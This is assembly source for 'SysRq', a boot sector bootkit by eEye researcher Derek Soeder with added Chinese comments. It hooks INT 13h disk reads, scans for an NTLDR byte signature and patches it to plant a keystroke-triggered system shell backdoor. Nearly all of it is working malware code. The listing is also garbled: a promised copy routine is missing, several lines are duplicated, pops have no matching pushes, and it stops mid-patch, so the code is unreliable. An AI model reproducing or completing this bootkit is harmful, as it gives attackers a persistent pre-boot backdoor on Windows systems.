;===============================================================
; SysRq v0.0
;---------------------------------------------------------------
; Custom boot sector code that installs a keystroke backdoor to
; provide a system shell.
;安装一个按键的记录后门
; Derek Soeder - eEye Digital Security - 07/07/2005
;===============================================================
.486p
.model tiny
BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h
mov ax, ds:[0413h] ; 0040h:0013h - base memory size in KBs
and al, NOT 3 ; make sure we get memory on a page boundary
sub ax, 4 ; allocate 4KB (one page) for our code
mov ds:[0413h], ax
shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a
segment)
mov es, ax
;
; Copy ourselves to reserved memory and initialize the rest to zeroes
;
;
; Read second sector of our code (for bootable CDs, floppy emulation mode must be specified)
;
sti
mov ax, 0201h ; AL: number of sectors
mov cl, 2 ; CH: cylinder; CL: sector and high bits of cylinder
cdq ; DH: track; DL: drive number
mov bh, (200h / 100h) ; ES:BX: destination buffer
int 13h ; INT 13h/AH=02h: Read sector(s) into memory
jc short @NoINT13Hook
mov word ptr ds:[13h*4], (@Int13Hook) ; point INT 13h vector to our hook handler
mov ds:[(13h*4) + 2], es
sti
@NoINT13Hook:
;
; Load and execute MBR from first hard drive (do this from resident code)
;
push es
push @BootFromHDD
retf
@BootFromHDD:
mov es, dx ; DX = 0 from above
mov ax, 0201h ; AL: number of sectors
dec cx ; CH: cylinder; CL: sector and high bits of cylinder
mov dl, 80h ; DH: head; DL: drive number
mov bh, (BOOTORG / 100h) ; ES:BX: destination buffer
int 13h ; INT 13h/AH=02h: Read sector(s) into memory
popad
pop ds
pop sp
db 0EAh ; JMP FAR 0000h:7C00h
dw BOOTORG, 0000h
;##################################
;## INT 13h Hook Real-Mode ISR ##
;##################################
@Int13Hook:
pushf
cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
je short @Int13Hook_ReadRequest
cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
je short @Int13Hook_ReadRequest
popf
db 0EAh ; JMP FAR INT13HANDLER
INT13HANDLER EQU $
dd ?
@Int13Hook_ReadRequest:
mov byte ptr cs:[INT13LASTFUNCTION], ah
;
; Invoke original handler to perform read operation
;
popf
pushf ; push Flags because we're simulating an INT
call dword ptr cs:[INT13HANDLER] ; call original handler
jc short @Int13Hook_ret ; abort immediately if read failed
pushf
cli
push es
pusha
;
; Adjust registers to emulate an AH=02h read if AH=42h was used
;
mov ah, 00h
INT13LASTFUNCTION EQU $-1
cmp ah, 42h
jne short @Int13Hook_notextread
lodsw
lodsw ; 02h WORD number of blocks to transfer
les bx, [si] ; 04h DWORD transfer buffer
@Int13Hook_notextread:
;
; Scan sector for a signature of the code we want to modify
;
test al, al
jle short @Int13Hook_scan_done
;开始HOOK NTLDR扫描ntldr的标志,在HOOK INT 13H中断操作中需要对NTLDR的特征码进行扫描
cld
@Int13Hook_scan_loop:
; 8B F0 MOV ESI, EAX
; 85 F6 TEST ESI, ESI
; 74 21 JZ $+23h
; 80 3D ... CMP BYTE PTR [ofs32], imm8
; (the first 6 bytes of this signature exist in other
modules!)
repne scasb
jne short @Int13Hook_scan_done
cmp dword ptr es:[di], 74F685F0h
jne short @Int13Hook_scan_loop
cmp word ptr es:[di+4], 8021h ;找到ntldr了?
jne short @Int13Hook_scan_loop
;//////////////////////////////////////////////////////////////////
mov word ptr es:[di-1], 15FFh ; FFh/15h: CALL NEAR [ofs32]
mov eax, cs
shl eax, 4
or cs:[(KEASSTHOOK_PTE - @SYSRQCODE32_START) + SYSRQCODE16_SIZE], eax
add ax, (@PatchFunction - @SYSRQCODE32_START) + SYSRQCODE16_SIZE
; should be okay to add to AX, since we can't cross 1KB boundary
mov cs:[(PATCHFUNC32_LINEAR - @SYSRQCODE32_START) + SYSRQCODE16_SIZE], eax
or cs:[(KEASSTHOOK_PTE - @SYSRQCODE32_START) + SYSRQCODE16_SIZE], eax
add ax, (@PatchFunction - @SYSRQCODE32_START) + SYSRQCODE16_SIZE
; should be okay to add to AX, since we can't cross 1KB boundary
mov cs:[(PATCHFUNC32_LINEAR - @SYSRQCODE32_START) + SYSRQCODE16_SIZE], eax
sub ax, (@PatchFunction - PATCHFUNC32_LINEAR)
mov es:[di+1], eax
